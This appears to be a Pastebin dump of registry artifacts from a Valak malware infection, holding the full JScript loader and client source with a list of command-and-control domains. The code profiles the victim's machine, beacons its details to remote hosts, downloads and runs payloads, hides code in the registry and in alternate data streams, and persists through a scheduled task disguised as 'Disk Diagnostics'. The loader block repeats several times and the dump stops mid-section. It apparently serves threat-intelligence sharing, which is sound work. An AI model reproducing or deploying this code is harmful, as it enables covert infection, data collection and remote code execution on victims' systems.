Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Valak #Config #New
- Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer
- Class Name: <NO CLASS>
- Last Write Time: 6/3/2020 - 10:49 PM
- Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer\Appsw64
- Class Name: <NO CLASS>
- Last Write Time: 6/3/2020 - 10:49 PM
- Value 0
- Name: ShimV4
- Type: REG_SZ
- Data: http://a-zcorner.com
- Value 1
- Name: SetupServiceKey
- Type: REG_SZ
- Data: 79e5036f32
- Value 2
- Name: ServerUrl
- Type: REG_SZ
- Data: var client_config = {
- COMMAND_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- CLIENT_ID : '7EF8C89EC08D346C7D45FC7994D29D96',
- C2_REQUEST_SLEEP : 20,
- C2_FAIL_SLEEP : 1,
- C2_FAIL_COUNT : 3,
- C2_OB_KEY : 'JxTRG4mY',
- SOFT_VERSION : 32,
- C2_COMMAND_PREFIX : 'api.aspx',
- C2_USE_IEXPLORE : false
- }
- var CLIENT_IMPORT_ENV = true;
- var Client = {};
- Client.CoMainObject = new ActiveXObject('WScript.Shell');
- Client.LoadLibraryReg = function(){
- return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
- }
- Client.LibraryLoadContext = function(){
- eval(Client.LoadLibraryReg());
- Client.Windows = Windows;
- Client.GlobalStrings = GlobalStrings;
- Client.DataTools = DataTools;
- Client.ObjectProducer = ObjectProducer;
- Client.Http = Http;
- Client.Loader = Loader;
- Client.debug = debug;
- }
- Client.GetWorkerEndpoint = function(){
- var nonce = Client.DataTools.Random.String(12);
- var uid = Client.Loader.GetUid();
- var sessionKey = nonce + client_config.C2_OB_KEY;
- var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&apikey=" + Client.DataTools.Random.String(2) + "&g=" + nonce + "&selected=2";
- }
- Client.PrepareExectionTask = function(taskName){
- var currentTime = new Date(),
- hours = currentTime.getHours(),
- minutes = currentTime.getMinutes();
- hours = hours < 10 ? "0" + hours.toString() : hours;
- minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
- var time = hours + ":" + minutes;
- var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
- var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
- var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
- Client.Windows.Execute(taskCommand);
- }
- Client.ExecutePlugin = function(pluginId){
- var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
- var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
- Client.Windows.Execute(command);
- }
- Client.GetTask = function(){
- for(var i = 0; i < client_config.COMMAND_C2.length; i++){
- var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
- response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
- if(response.indexOf("--TASK") !== -1){
- var executionTask = response.replace('--TASK--', '').split('--')[1];
- var taskName = response.split('--')[2];
- Client.PrepareExectionTask(taskName);
- Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
- return;
- }
- if(response.indexOf('--PLUGIN') !== -1){
- var plugin = response.replace('--PLUGIN--', '');
- Client.ExecutePlugin(plugin);
- return;
- }
- WScript.Sleep(client_config.C2_REQUEST_SLEEP * 1000);
- }
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- Client.LibraryLoadContext();
- WScript.Sleep(1 * 60 * 1000);
- Client.GetTask();
- Value 3
- Name: WebLib32
- Type: REG_SZ
- Data: var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
